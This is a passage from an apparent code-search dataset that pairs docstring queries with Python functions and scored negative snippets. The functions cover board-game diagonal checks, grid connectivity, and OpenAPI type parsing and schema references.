diag_win(board):\n\tif board[1][1] != EMPTY and (board[1][1] == board[0][2] == board[2][0] or board[1][1] == board[0][0] == board[2][2]):\n\t\treturn True\n\treturn False", "def is_at_intersection(self):\n directions = 0\n self.tile = (self.get_nearest_row(), self.get_nearest_col())\n if self.internal_map[self.tile[0] - 1][self.tile[1]] not in ('x', ):\n directions += 1\n if self.internal_map[self.tile[0] + 1][self.tile[1]] not in ('x', ):\n directions += 1\n if self.internal_map[self.tile[0]][self.tile[1] - 1] not in ('x', ):\n directions += 1\n if self.internal_map[self.tile[0]][self.tile[1] + 1] not in ('x', ):\n directions += 1\n return True if directions > 2 else False", "def XRoadConnect(data, x1, y1, x2, y2):\n flag = True\n if not y1 == y2:\n return False\n x_start = min(x1, x2)\n x_end = max(x1, x2)\n for i in range(x_start + 1, x_end):\n if not data[y1][i] == 0:\n flag = False\n break\n return flag", "def is_diagonal(self):\n return self.is_upper() and self.is_lower()", "def check_diagonals(self, win: list) -> bool:\r\n for i in range(self.size - self.win_condition + 1):\r\n # [x x ]\r\n # [ x x ]\r\n # [ x x]\r\n # [ x]\r\n diagonal = []\r\n x = i\r\n y = 0\r\n for j in range(self.size - i):\r\n diagonal.append(self.tags[x][y])\r\n x += 1\r\n y += 1\r\n for j in range(len(diagonal) - len(win) + 1):\r\n if win == diagonal[j:j + self.win_condition]:\r\n return True\r\n # [x ]\r\n # [x x ]\r\n # [ x x ]\r\n # [ x x]\r\n diagonal = []\r\n x = 0\r\n y = i\r\n for j in range(self.size - i):\r\n diagonal.append(self.tags[x][y])\r\n x += 1\r\n y += 1\r\n for j in range(len(diagonal) - len(win) + 1):\r\n if win == diagonal[j:j + self.win_condition]:\r\n return True\r\n\r\n # [ x x]\r\n # [ x x ]\r\n # [x x ]\r\n # [x ]\r\n diagonal = []\r\n x = self.size - 1 - i\r\n y = 0\r\n for j in range(self.size - i):\r\n diagonal.append(self.tags[x][y])\r\n x -= 1\r\n y += 1\r\n for j in range(len(diagonal) - len(win) + 1):\r\n if win == diagonal[j:j + self.win_condition]:\r\n return True\r\n # [ x]\r\n # [ x x]\r\n # [ x x ]\r\n # [x x ]\r\n diagonal = []\r\n x = self.size - 1\r\n y = 0 + i\r\n for j in range(self.size - i):\r\n diagonal.append(self.tags[x][y])\r\n x -= 1\r\n y += 1\r\n for j in range(len(diagonal) - len(win) + 1):\r\n if win == diagonal[j:j + self.win_condition]:\r\n return True", "def onlydiag(self):\n for y in xrange(0, len(self.a)):\n if not (isinstance(self.a[y], fakelist) and (len(self.a[y].a) == 0 or (len(self.a[y].a) == 1 and y in self.a[y].a))):\n return False\n return True", "def 
col_clashes(bs, c):\r\n for i in range(c):\r\n if share_diagonal(i,bs[i], c,bs[c]):\r\n return True\r\n return False", "def YRoadConnect(data, x1, y1, x2, y2):\n flag = True\n if not x1 == x2:\n return False\n y_start = min(y1, y2)\n y_end = max(y1, y2)\n for i in range(y_start + 1, y_end):\n if not data[i][x1] == 0:\n flag = False\n break\n return flag", "def check_diagonals(self):\n\t\tdiags = [[(0,0), (1,1), (2,2)], [(0,2), (1,1), (2,0)]]\n\n\t\tfor diag in diags:\n\t\t\tpts = 0\n\t\t\tfor loc in diag:\n\t\t\t\tif self.board[loc[0]][loc[1]] == self.marker:\n\t\t\t\t\tpts+=1\n\t\t\tif pts == 3:\n\t\t\t\tprint('WE WON')\n\t\t\t\treturn True", "def diagonal_pairings(mat):\n\tw, h = mat.shape\n\tx = mat[:-1,:-1]\n\ty = mat[1:, 1:]\n\tx_cor_list = []\n\ty_cor_list = []\n\tfor i in range(w-1):\n\t\tfor j in range(h-1):\n\t\t\tx_cor_list.append(x[i, j])\n\t\t\ty_cor_list.append(y[i, j])\n\n\treturn x_cor_list, y_cor_list", "def check_diag(self):\r\n if self.grid[4][-1] != ' ':\r\n if self.grid[0][-1] == self.grid[4][-1] and self.grid[4][-1] == self.grid[8][-1]:\r\n return (4, (self.grid[0], self.grid[8]))\r\n elif self.grid[2][-1] == self.grid[4][-1] and self.grid[4][-1] == self.grid[6][-1]:\r\n return (4, (self.grid[2], self.grid[6]))\r\n return (-1, None)", "def square2_checker(self, x, y, row2, col2):\n \n self.x = x\n self.y = y\n self.row2 = row2\n self.col2 = col2\n\n return abs(self.x - self.row2) == 1 and self.col2 == self.y \\\n or abs(self.y - self.col2) == 1 and self.row2 == self.x", "def is_neighbour(self, other, diagonal):\n return other in self.neighbours(diagonal)", "def diagonalIntersection(self):\n l1 = self.diagonalAtPoint(idx=0)\n l2 = self.diagonalAtPoint(idx=1)\n return l1.intersectionWith(l2)", "def is_symmetric(mat):\n return np.allclose(mat.T, mat)", "def is_diagonal(self):\n return self.rep.is_diagonal()", "def check_diagonals():\n global game_still_going\n # Check if any of the rows have all the same value.\n diagonal1 = board[0] == board[4] == board[8] != '_'\n diagonal2 = board[6] == board[4] == board[2] != '_'\n # If any diagonals does have a match, then game still going to False.\n if diagonal1 or diagonal2:\n game_still_going = False\n # Return winner 'X' or 'O'.\n if diagonal1:\n return board[0]\n if diagonal2:\n return board[6]", "def diagonal_win():\n\n diagonal_set = set()\n for i in range(0, board_size):\n diagonal_set.add(self.board[i][i]) \n\n if diagonal_set == set([o_symbol]) or diagonal_set == set([x_symbol]):\n print \"diagonal win 1\"\n return True\n \n diagonal_set = set()\n for i in range(0, board_size):\n diagonal_set.add(self.board[i][board_size - 1 - i])\n\n if diagonal_set == set([o_symbol]) or diagonal_set == set([x_symbol]):\n print \"diagonal win 2\"\n return True", "def seg_x_in_y(self, x: str, y: str) -> bool:\n return len(set(x + y)) == len(y)", "def ishomog(tr):\n \n return tr.shape == (4, 4)", "def is_connected(object_one, object_two):\n\n for vert_one in object_one.Vertexes:\n for vert_two in object_two.Vertexes:\n if (vert_one.X == vert_two.X) and (vert_one.y == vert_two.y):\n return True\n\n return False", "def is_diagonal(x):\n return (isinstance(x, tf.linalg.LinearOperatorIdentity) or\n isinstance(x, tf.linalg.LinearOperatorScaledIdentity) or\n isinstance(x, tf.linalg.LinearOperatorDiag))" ]
[ "0.8518046", "0.8518046", "0.8502754", "0.84337777", "0.7760696", "0.70689964", "0.70689964", "0.706408", "0.6565794", "0.65179807", "0.6373702", "0.63458717", "0.63303655", "0.6296012", "0.6293987", "0.62332195", "0.62295103", "0.61589813", "0.61407775", "0.6136831", "0.61246556", "0.6121262", "0.6102582", "0.6069114", "0.60655206", "0.6061314", "0.6060001", "0.6055612", "0.6049005", "0.6048393" ]
0.88636863
0
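A quick sanity check of the `share_diagonal` document above; the board coordinates are illustrative, not part of the record:

```python
def share_diagonal(x0, y0, x1, y1):
    # Two squares clash when their row and column offsets are equal.
    return abs(x0 - x1) == abs(y0 - y1)

assert share_diagonal(0, 0, 3, 3)      # same falling diagonal
assert share_diagonal(2, 5, 5, 2)      # same rising diagonal
assert not share_diagonal(0, 0, 1, 2)  # offsets differ, no clash
```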
Parse a formatted string and return the names of the args and their types. Raises a ValueError if the type is not a pyopenapi3 `Field` or an already defined Component Parameter type. If the type represents a `Field`, its type is returned; otherwise, if it is an already defined Component Parameter, the name of the class that defines the parameter is returned.
def parse_name_and_type_from_fmt_str(\n    formatted_str: str,\n    allowed_types: Optional[Dict[str, Component]] = None\n) -> Generator[Tuple[str, Type[Field]], None, None]:\n    for _, arg_name, _type_name, _ in Formatter().parse(formatted_str):\n        if arg_name is not None:\n            try:\n                assert _type_name is not None\n                _type = (\n                    allowed_types[_type_name]\n                    if allowed_types is not None and _type_name in allowed_types\n                    else getattr(pyopenapi3.data_types, _type_name)\n                )\n                yield arg_name, _type\n            except AttributeError:\n                raise ValueError(\n                    "A non-`Field` or `OpenApiObject` type was found. "\n                    f"Can't use `{_type_name}` as a type in {formatted_str}. "\n                    f"Must be a stringified pyopenapi3 `data_type`, such "\n                    f"as `pyopenapi3.data_types.String`, or a reference to a "\n                    f"Component."\n                ) from None
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def extract_type(self, param):\n\n def evaluate(instance):\n if isinstance(instance, (Struct, Enum)):\n return instance.name\n if isinstance(instance, (Integer, Float)):\n return 'Number'\n return type(instance).__name__\n\n if isinstance(param.param_type, Array):\n return self.replace_sync(evaluate(param.param_type.element_type)) + '[]'\n return self.replace_sync(evaluate(param.param_type))", "def parse_params(txt):\n res = list()\n # First, slipt with stuff looking like \\TYPE:\n splitted = re.split(r'\\s*\\\\(\\w+)\\s*:', txt)\n # We now have a list looking like:\n # ['', 'flag', '....', 'param', '...']\n i = 1\n while i < len(splitted) - 1:\n type = splitted[i]\n rest = splitted[i+1]\n if type == \"argn\":\n name = \"remaining args\"\n desc = rest\n else:\n # first word is the name, the rest is the description:\n match = re.match(r'\\s*(\\w+)\\s*(.*)', rest, re.DOTALL)\n if not match:\n print(\"warning, failed to parse parameters\")\n print(\"near\", rest)\n break\n (name, desc) = match.groups()\n desc = clean_indent(desc)\n res.append((type, name, desc))\n i += 2\n return res", "def typeString(self):\n return Parameter.string_dict[self._field.type]", "def _params_formatter(field):\n heads = ['param']\n types = _or_types(field)\n if types:\n heads.append(types)\n heads.append(field['name'])\n tail = field.get('description', '')\n return heads, tail", "def type_name(self):\n return \"%s %s\" % (self.param_type, self.name)", "def _validate_type(self, tp: str, name: str = None):\n if tp is None:\n return None, None\n\n fields = None\n if tp.startswith('{'):\n # Submodel defined in JSON\n fields = parse_json_model(tp, modelname=name)\n if not fields:\n return None, None\n return snake_to_camel(name), fields\n\n normal_type = get_type_from_str(tp)\n if normal_type != \"None\":\n tp = normal_type\n\n return tp, fields", "def FormatParamType(self, param):\n return self.ToPpapiType(param.type_, optional=param.optional)", "def unparse_type(type_str):\n if not type_str.startswith('array'):\n return type_str\n arg_dim = type_str.lstrip('array')[0]\n data_type = type_str.lstrip('array')[1:]\n arg_type = \"vizgen.ndarray('\" + data_type + \"', \" + arg_dim + \")\"\n return arg_type", "def _parse_and_validate(self, val):\n if self._is_parameter_type:\n val = self._parse(val) if isinstance(val, str) else val\n self._validate_or_throw(val)\n return val", "def parseTypeString(inTypeString):\n curType = Type()\n curStack = []\n for c in inTypeString:\n if c == '<':\n curStack.append(curType)\n curType = Type()\n curStack[-1].templateParams.append(curType)\n elif c == '>':\n curType = curStack.pop()\n elif c == ',':\n curType = Type()\n curStack[-1].templateParams.append(curType)\n else:\n curType.name += c\n curType.trimNames()\n return curType", "def argument_type(arg):\n types = (int, float)\n \n for t in types:\n try:\n return type(t(arg))\n except ValueError:\n continue\n \n return str", "def map_param_type(param_type):\n main_type, sub_type = TYPE_INFO_RE.match(param_type).groups()\n\n if main_type in ('list', 'array'):\n # Handle no sub-type: \"required list\"\n if sub_type is not None:\n sub_type = sub_type.strip()\n\n if not sub_type:\n sub_type = 'str'\n\n # Handle list of pairs: \"optional list<pair<callsign, path>>\"\n sub_match = TYPE_INFO_RE.match(sub_type)\n if sub_match:\n sub_type = sub_match.group(1).lower()\n\n return [PARAM_TYPE_MAP.setdefault(sub_type, string_types)]\n\n return PARAM_TYPE_MAP.setdefault(main_type, string_types)", "def get_type(args_str, entry_type):\r\n # The 
C-method-implementations accept self as the first argument,\r\n # so a one-argument method will be invoked with zero arguments in Python.\r\n no_args = 1 if entry_type == \"method\" else 0\r\n return (\"METH_NOARGS\" if len(args_str.split(\",\")) == no_args\r\n else \"METH_VARARGS\")", "def arg_type(self):\n\n arg_type = self.ctype\n\n if 'int' in arg_type:\n arg_type = 'int'\n\n if self.is_list:\n arg_type = 'list of {}'.format(arg_type)\n\n if 'required' in self.qualifiers:\n arg_type = \"{}, optional\".format(arg_type)\n\n return arg_type", "def parse_fieldtype(value, fieldtype):\n\ttype_mapper = {\n\t\t\"int\": int,\n\t\t\"float\": float,\n\t\t\"basestring\": str,\n\t\t\"dict\": json.loads\n\t}\n\n\ttry:\n\t\tif fieldtype in type_mapper.keys():\n\t\t\treturn type_mapper[fieldtype](value)\n\t\telif fieldtype == \"list\":\n\t\t\traise Exception(\"Can't parse value to list type\")\n\t\telif fieldtype == \"date\":\n\t\t\treturn value\n\t\t# elif fieldtype == \"float\":\n\t\t# \treturn float(value)\n\t\t# elif fieldtype == \"basestring\":\n\t\t# \treturn str(value)\n\t\t# elif fieldtype == \"dict\":\n\t\t# \treturn json.loads(value)\n\texcept Exception, e:\n\t\traise e", "def _GetTypeName(cls: Optional[TypeHinter]) -> str:\n if isinstance(cls, FieldDescriptor):\n # First, check for the `sem_type` protobuf option and its `type` field.\n sem_type_option = cls.GetOptions().Extensions[semantic_pb2.sem_type]\n if sem_type_option.type in rdf_type_schemas:\n return sem_type_option.type\n\n if _IsMapField(cls):\n map_type_name = _GetTypeName(cls.message_type)\n if map_type_name.endswith(\"Entry\"):\n map_type_name = map_type_name[:-5]\n\n key_value_d = _GetMapFieldKeyValueTypes(cls)\n if key_value_d is None:\n raise AssertionError(f\"{cls} is not a map FieldDescriptor\")\n\n key_type_name = _GetTypeName(key_value_d.key)\n value_type_name = _GetTypeName(key_value_d.value)\n\n return f\"{map_type_name}Map_{key_type_name}:{value_type_name}\"\n\n if cls.message_type:\n return _GetTypeName(cls.message_type)\n\n if cls.enum_type:\n return _GetTypeName(cls.enum_type)\n\n return _GetTypeName(cls.type)\n\n if isinstance(cls, Descriptor):\n return cls.full_name\n\n if isinstance(cls, EnumDescriptor):\n return cls.full_name\n\n if isinstance(cls, type):\n return cls.__name__\n\n if isinstance(cls, int): # It's a `protobuf.Descriptor.type` value.\n return cast(str, primitive_types[cls][\"name\"])\n\n return str(cls) # Cover `BinaryStream` and `None`.", "def annotation_to_python(name, args, type_, template, sctypes):\n tab = ' ' * TABSIZE\n tokens = name.split(' ')\n pyname = ''.join([x.title() for x in tokens])\n cls = 'class {}({}):\\n'.format(pyname, type_.title())\n cls += '{}_trigedit_name = \"{}\"\\n'.format(tab, name)\n # pyargs = [type_to_sc_type(x['type']) for x in args]\n qparams = [x['type'] for x in args if x['is_quoted']]\n quoted_fields = '[\"{}\"]'.format(', '.join(qparams))\n if not quoted_fields:\n quoted_fields = ''\n cls += '{}_quoted_fields = frozenset({})\\n\\n'.format(tab, quoted_fields)\n # figure out the argument types\n imports = []\n for arg in args:\n param = arg['type']\n default = arg['default']\n if param in sctypes:\n ptype = type_to_sc_type(param, prefix='sc')\n imports.append(ptype)\n else:\n if re.search('^[0-9]+$', default):\n ptype = 'int'\n else:\n ptype = 'str'\n arg['pytype'] = ptype\n if len(args) > 0:\n typed_params = ', '.join(['{}: {}'.format(x['type'], x['pytype']) for x in args])\n cls += '{}def __init__(self, {}):\\n'.format(tab, typed_params)\n else:\n cls += 
'{}def __init__(self):\\n'.format(tab)\n joiner = '\\n{}{}'.format(tab, tab)\n fields = joiner.join(['self.{} = {}'.format(x['type'], x['type']) for x in args])\n if len(args) > 0:\n cls += '{}{}super().__init__()\\n{}{}{}'.format(tab, tab, tab, tab, fields)\n else:\n cls += '{}{}super().__init__()'.format(tab, tab)\n return cls, imports", "def to_value_type(cls, val_str, type_arg, member_type):\n if val_str is None:\n return None\n if type_arg == bool:\n return cls.ensure_bool(val_str)\n try:\n if type_arg == list:\n return ListValueComponent.create(val_str, member_type=member_type)\n if type_arg == dict:\n return DictValueComponent.create(val_str)\n return type_arg(val_str)\n except (TypeError, ValueError) as e:\n if issubclass(type_arg, Enum):\n choices = \", \".join(f\"{choice.value}\" for choice in type_arg)\n raise ParseError(f\"Invalid choice '{val_str}'. Choose from: {choices}\")\n raise ParseError(\n f\"Error applying type '{type_arg.__name__}' to option value '{val_str}': {e}\"\n )", "def show_type(self, arg):\n return (str(arg), str(type(arg)), arg)", "def type(self, tokens):\n if len(tokens) != 1:\n raise Exception(\"Unexpected argument counts\")\n return tokens[0].value", "def _params_formatter(field, description):\n heads = ['param']\n types = _or_types(field)\n if types:\n heads.append(types)\n heads.append(rst.escape(field['name']))\n tail = description\n return heads, tail", "def get_parameter(pstring):\n parameters = pstring.replace(',', ' ').split()\n if len(parameters) == 1:\n init_value = float(parameters[0])\n return (init_value, None, None)\n elif len(parameters) == 3:\n init_value = float(parameters[0])\n if parameters[1].upper() == 'NONE':\n lower_value = None\n else:\n lower_value = float(parameters[1])\n if parameters[2].upper() == 'NONE':\n upper_value = None\n else:\n upper_value = float(parameters[2])\n return (init_value, lower_value, upper_value)\n else:\n raise ValueError('Invalid parameter format: %s' % pstring)", "def extract_name_description(self, param):\n name = None\n description = None\n if getattr(param, 'description', None):\n description = param.description\n\n if getattr(param, 'primary_name', None):\n name = param.primary_name\n elif getattr(param, 'param_type', None):\n if getattr(param.param_type, 'name', None):\n name = param.param_type.name\n if not description and getattr(param.param_type, 'description', None):\n description = param.param_type.description\n elif getattr(param.param_type, 'element_type', None) and \\\n getattr(param.param_type.element_type, 'name', None):\n name = param.param_type.element_type.name\n if not description and getattr(param.param_type.element_type, 'description', None):\n description = param.param_type.element_type.description\n\n return self.replace_sync(name), self.extract_description(description)", "def parse_solr_field_name(solr_field_name):\n match = _FIELD_NAME_PATTERN.match(solr_field_name)\n if not match:\n raise ValueError('Provided Solr field does not belong to Search Service')\n field_name = match.group('field_name')\n solr_type = match.group('solr_type')\n language = match.group('language') or ''\n return field_name, solr_type, language", "def get_field_parameters(self, in_parms):\n if len(in_parms) == 0: # Check if there are params\n return None # If that's the case, return None\n\n values = [] # Empty values\n is_msg = False # Check if the param is a message\n for parm in in_parms: # Loop over params\n if parm.type == \"Field\": # If it is a message\n is_msg = True # Set is_message to true\n 
continue # Go to top of loop\n _type = eval(parm.type) # create a type object\n value = _type(parm.value) # Create the value, and cast it to the type\n values.append(value) # Add that into the parameters\n if is_msg is True: # check if is a message\n return in_parms # Return input params\n elif len(values) == 1: # If there is only one element\n return values[-1] # Return just that element\n else: # Otherwise\n return values # Return the params", "def type_str_of(x):\n try:\n # what other way? this is only way I know of, to detect XML-RPC server.\n if x.hasattr(x,\"_ServerProxy__host\"):\n return \"XML-RPC\"\n \n return { type(\"string\"): \"STR\",\n type(42): \"INT\",\n type(42.0): \"FLOAT\",\n type([]): \"LIST\",\n type({}): \"DICT\",\n type(Ref(\"\")): \"REF\",\n }[ type(x) ]\n except:\n return \"Not a string, int, float, list, or dict.\"", "def parse_typename(typename):\n if typename is None:\n raise ValueError(\"function type must be provided\")\n idx = typename.rfind(\"/\")\n if idx < 0:\n raise ValueError(\"function type must be of the from namespace/name\")\n namespace = typename[:idx]\n if not namespace:\n raise ValueError(\"function type's namespace must not be empty\")\n type = typename[idx + 1:]\n if not type:\n raise ValueError(\"function type's name must not be empty\")\n return namespace, type", "def type_def_line(cls, line):\n type_def = None\n if not cls.type_match(line):\n sline = line.strip()\n if sline.lower()[0:4] == 'type':\n if '::' in sline:\n elements = sline.split('::')\n type_name = elements[1].strip()\n type_props = [x.strip() for x in elements[0].split(',')[1:]]\n else:\n # Plain type decl\n type_name = sline.split(' ', 1)[1].strip()\n type_props = None\n # End if\n if '(' in type_name:\n tnstr = type_name.split('(')\n type_name = tnstr[0].strip()\n type_params = '(' + tnstr[1].rstrip()\n else:\n type_params = None\n # End if\n type_def = [type_name, type_props, type_params]\n # End if\n # End if\n return type_def", "def get_template_arg(self, tag, the_args, for_class):\n if the_args:\n args = the_args.split(\",\")\n args = [x.strip() for x in args]\n else:\n args = []\n\n class_name = \"\"\n if for_class:\n class_name = for_class.name\n\n bad_arg = False\n\n tag = tag.upper();\n if tag == \"NAME\":\n if len(args):\n class_name = args[-1]\n for i in self.classes:\n if i.name == class_name:\n return i.name\n bad_arg = True\n\n if tag == \"STRUCT\":\n if len(args):\n class_name = args[-1]\n for i in self.classes:\n if i.name == class_name:\n return i.class_struct_name\n bad_arg = True\n\n if tag == \"TYPE_STRUCT\":\n if len(args):\n class_name = args[-1]\n for i in self.classes:\n if i.name == class_name:\n return i.type_struct_name\n bad_arg = True\n\n if tag == \"NEW\":\n if len(args):\n class_name = args[-1]\n for i in self.classes:\n if i.name == class_name:\n return \"%s()\" % i.class_new_func_name\n bad_arg = True\n\n if tag == \"IS_INSTANCE\":\n if len(args) > 1:\n class_name = args[-1]\n for i in self.classes:\n if i.name == class_name:\n return \"%s(%s)\" % (i.class_is_instance_func_name, args[0])\n bad_arg = True\n\n if tag == \"CAST\":\n if len(args) > 1:\n class_name = args[-1]\n for i in self.classes:\n if i.name == class_name:\n return \"reinterpret_cast<%s*>(%s)\" % (i.class_struct_name, args[0])\n bad_arg = True\n\n if tag == \"COPY\":\n if len(args) > 1:\n class_name = args[-1]\n for i in self.classes:\n if i.name == class_name:\n return \"%s(%s)\" % (i.class_copy_func_name, args[0])\n bad_arg = True\n\n if bad_arg:\n raise ValueError(\"Bad 
arguments '%s' to template tag '%s' (object:%s)\" % (the_args, tag, class_name))\n raise ValueError(\"Unknown template tag '%s'\" % tag)", "def str_to_type(name_type):\n if name_type == 'float' or name_type == 'Float':\n return float\n if name_type == 'bool':\n return bool\n if name_type == 'int':\n return lambda x: int(float(x))\n if name_type == 'list':\n return ast.literal_eval\n if name_type == 'date':\n return lambda x: dateutil.parser.parse(x).strftime('%Y-%m-%dT%H:%M:%SZ')\n if name_type == 'str':\n return str\n\n \n return None" ]
[ "0.5762772", "0.56126136", "0.5612374", "0.5606245", "0.5510904", "0.5498231", "0.54389805", "0.5416661", "0.5379599", "0.53538597", "0.5281033", "0.52633864", "0.522637", "0.51833683", "0.5179722", "0.5152138", "0.51198363", "0.51118517", "0.50726426", "0.5072116", "0.5070442", "0.50484437", "0.5038657", "0.50124013", "0.49934113", "0.495798", "0.4947225", "0.49403617", "0.49176028", "0.49140236" ]
0.74992687
0
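The document above leans on `string.Formatter().parse`, which splits each `{name:Type}` field into its name and format spec. A dependency-free sketch of that mechanism, with a plain dict assumed in place of `pyopenapi3.data_types`:

```python
from string import Formatter

ALLOWED = {"String": str, "Integer": int}  # stand-in for pyopenapi3.data_types

def parse_args(fmt):
    # Formatter().parse yields (literal_text, field_name, format_spec, conversion)
    for _literal, arg_name, type_name, _conv in Formatter().parse(fmt):
        if arg_name is None:
            continue
        if type_name not in ALLOWED:
            raise ValueError(f"Can't use `{type_name}` as a type in {fmt}.")
        yield arg_name, ALLOWED[type_name]

print(list(parse_args("/users/{id:Integer}/posts/{slug:String}")))
# [('id', <class 'int'>), ('slug', <class 'str'>)]
```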
Convert a custom object to a schema. This is done by creating a reference to the object. Any non-reference object should be created by the Components builder. The param `obj` must be a subtype of `data_types.Component`. Its type will determine what kind of component it is, e.g. '/components/schemas/...' or '/components/parameters/...'.
def convert_objects_to_schema(obj: Type[Component]) -> ReferenceObject:\n    cmp_type: str = 'schemas'  # default component type\n    if hasattr(obj, '__cmp_type__'):\n        cmp_type = obj.__cmp_type__.lower()  # type: ignore\n    return create_reference(obj.__name__, cmp_type)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def make_schema(obj):\n\n if not isinstance(obj, Schema):\n if isinstance(obj, dict):\n return DictStructure(obj)\n elif isinstance(obj, list):\n return ListStructure(obj)\n elif isinstance(obj, (int, float, str, bool)) or (obj is None):\n return Value(obj)\n else:\n raise ValueError(f\"object {obj} cannot be represented as a JSON Structure\")\n else:\n return obj", "def object_hook(self, obj: Any) -> Any:\n if '__type__' in obj:\n if obj['__type__'] == 'complex':\n val = obj['__value__']\n return val[0] + 1j * val[1]\n if obj['__type__'] == 'array':\n return np.array(obj['__value__'])\n if obj['__type__'] == 'result':\n return Result.from_dict(obj['__value__'])\n if obj['__type__'] == 'to_json':\n return obj['__value__']\n if obj['__type__'] == 'dill':\n decoded = base64.standard_b64decode(obj['__value__'])\n return dill.loads(decoded)\n return obj", "def mkcomponent(self,\n context=[],\n componentobj=None):\n if componentobj == None:\n raise ValueError, \"mkcomponent: componentobj is None\"\n return jsoncall.do_call(\"mkcomponent\", {'modelname':self.modelname,\\\n 'user':self.user,\\\n 'password':self.password,\\\n 'context':context,\\\n 'componentobj':componentobj.__dict__},\n self.connection)", "def __init__(self, obj):\n if isinstance(obj, str):\n # The schema given is some kind of handle which we try to open\n self.data = self._get_schema_content(obj)\n else:\n self.data = obj", "def fromObject(cls, obj, decode=None):\n if obj.__doc__ is None:\n return cls(u'' if decode else '')\n r = cls.fromString(obj.__doc__, decode=decode)\n return r", "def from_object(cls, obj, base_rule=None):\n if isinstance(obj, dict):\n return cls.from_dict(obj, base_rule=base_rule)\n elif isinstance(obj, Iterable):\n return cls.from_iterable(obj, base_rule=base_rule)\n else:\n raise ValueError('Cannot build {0} from {1}'.format(cls, type(obj)))", "def coerce_type(cls, obj, typedef=None, **kwargs):\n if trimesh and isinstance(obj, trimesh.base.Trimesh):\n obj = ObjDict.from_trimesh(obj)\n if isinstance(obj, dict) and ('material' in obj):\n obj['material'] = tools.bytes2str(obj['material'])\n return super(ObjMetaschemaType, cls).coerce_type(\n obj, typedef=typedef, **kwargs)", "def from_obj(self, obj):\n self.__obj = obj\n self.__obj.swagger_types = self.swagger_types\n self.__obj.swagger_map = self.swagger_map", "def parse_obj(obj: ObjectType) -> bytes:\n if isinstance(obj, PDFObject):\n return parse_obj(obj.value)\n elif isinstance(obj, PDFRef):\n return obj.ref\n elif isinstance(obj, dict):\n if '__stream__' in obj:\n return parse_stream(obj)\n else:\n return parse_dict(obj)\n elif isinstance(obj, (list, tuple, set)):\n return parse_list(obj)\n elif isinstance(obj, bytes):\n return obj\n elif isinstance(obj, bool):\n return b'true' if obj else b'false'\n elif isinstance(obj, (int, float)):\n return str(obj).encode('latin')\n elif isinstance(obj, str):\n return ('(' + re.sub(r'([()])', r'\\\\\\1', obj) + ')').encode('latin')", "def build(self, obj):\n if isinstance(obj, self.art_type):\n return obj\n elif isinstance(obj, (tuple, list, dict, set)):\n if obj.__class__ is tuple:\n return self.build_tuple(obj)\n elif obj.__class__ is dict:\n return self.build_dict(obj)\n elif obj.__class__ is list:\n return self.build_list(obj)\n else:\n return self.build_set(obj)\n elif isinstance(obj, SageObject):\n return self.build_from_magic_method(obj)\n else:\n return self.build_from_string(obj)", "def fromObj(self, obj):\n for k in BaseNode.SERIALIZABLE_PROPERTIES:\n if k in obj:\n # work around for migrate nodeInfo 
class\n if k == \"nodeInfo\":\n if isinstance(obj[k], dict):\n obj[k] = NodeInfo(obj[k][\"showInputs\"], obj[k][\"showOutputs\"], obj[k]\n [\"showLabel\"], obj[k][\"showBorder\"], obj[k][\"fill\"], obj[k][\"useNodeFont\"])\n\n setattr(self, k, obj[k])", "def make(obj):\n if isinstance(obj, dict):\n if isinstance(obj, Struct):\n ObjType = type(obj)\n else:\n ObjType = Struct\n return ObjType(**{k: Struct.make(v) for k, v in obj.items()})\n\n elif isinstance(obj, list):\n return [Struct.make(v) for v in obj]\n\n return obj", "def do(self, obj):\n if isinstance(obj, str):\n return 'st__' + obj\n\n if type(obj) in literals:\n return obj\n\n # Now check for list, set, and tuple, and skip if they don't contain\n # any non-literals\n if type(obj) in builtin_iterables:\n if all(isinstance(x, literals) for x in flattened(obj)):\n return as_nested_lists(obj)\n\n oid = id(obj)\n if oid in self._working:\n raise GlueSerializeError(\"Circular reference detected\")\n self._working.add(oid)\n\n fun, version = self._dispatch(obj)\n logging.debug(\"Serializing %s with %s\", obj, fun)\n result = fun(obj, self)\n\n if isinstance(obj, types.FunctionType):\n result['_type'] = 'types.FunctionType'\n elif isinstance(obj, types.MethodType):\n result['_type'] = 'types.MethodType'\n else:\n result['_type'] = \"%s.%s\" % (type(obj).__module__,\n type(obj).__name__)\n if version > 1:\n result['_protocol'] = version\n\n self._working.remove(oid)\n return result", "def from_obj(cls, obj: any) -> Objdict:\n # CASE: list. Convert each item in the list.\n if isinstance(obj, list):\n value = [cls.from_obj(item) for item in obj]\n\n # CASE: dictionary. Convert each item in the dictionary.\n elif isinstance(obj, dict):\n d = {k: cls.from_obj(v) for k, v in obj.items()}\n value = cls(**d)\n\n # CASE: basic number or string. Use the item \"as is\"\n elif (\n isinstance(obj, str)\n or isinstance(obj, Number)\n or isinstance(obj, date)\n or obj is None\n ):\n value = obj\n\n # CASE: object with an internal dictionary. 
Treat like a dictionary.\n elif hasattr(obj, \"__dict__\"):\n value = cls.from_obj(obj.__dict__)\n\n # OTHERWISE: we need to figure it out.\n else:\n raise DocumentException(f\"Objdict.from_dict: can't convert value {obj}\")\n\n return value", "def fl_get_object_component(ptr_flobject, flobjclass, compontype, seqnum):\n _fl_get_object_component = library.cfuncproto(\n library.load_so_libforms(), \"fl_get_object_component\",\n cty.POINTER(xfdata.FL_OBJECT), [cty.POINTER(xfdata.FL_OBJECT),\n cty.c_int, cty.c_int, cty.c_int], \\\n \"\"\"FL_OBJECT * fl_get_object_component(FL_OBJECT * composite,\n int objclass, int type, int numb)\"\"\")\n library.check_if_flinitialized()\n library.verify_flobjectptr_type(ptr_flobject)\n i_flobjclass = library.convert_to_intc(flobjclass)\n i_compontype = library.convert_to_intc(compontype)\n i_seqnum = library.convert_to_intc(seqnum)\n library.keep_elem_refs(ptr_flobject, flobjclass, i_flobjclass, \\\n compontype, i_compontype, seqnum, i_seqnum)\n retval = _fl_get_object_component(ptr_flobject, i_flobjclass, \\\n i_compontype, i_seqnum)\n return retval", "def _from_object(cls, context, obj):\n kwargs = {\n 'id': obj.id,\n 'enabled': obj.enabled,\n 'data': obj.data,\n 'last_op': obj.last_op,\n 'priority': obj.priority,\n\n # derived data\n 'cluster_name': obj.cluster.name,\n 'policy_name': obj.policy.name,\n 'policy_type': obj.policy.type,\n }\n\n return cls(obj.cluster_id, obj.policy_id, context=context, **kwargs)", "def convert_to_references(obj):\n if isinstance(obj, BaseReferenceResource):\n if hasattr(obj, 'id') and not obj.id:\n logger.warning('Id missing for object ' + str(obj.__dict__) + '.\\nFMC may fail to resolve this reference.')\n converted_obj = ReferenceType(obj)\n elif 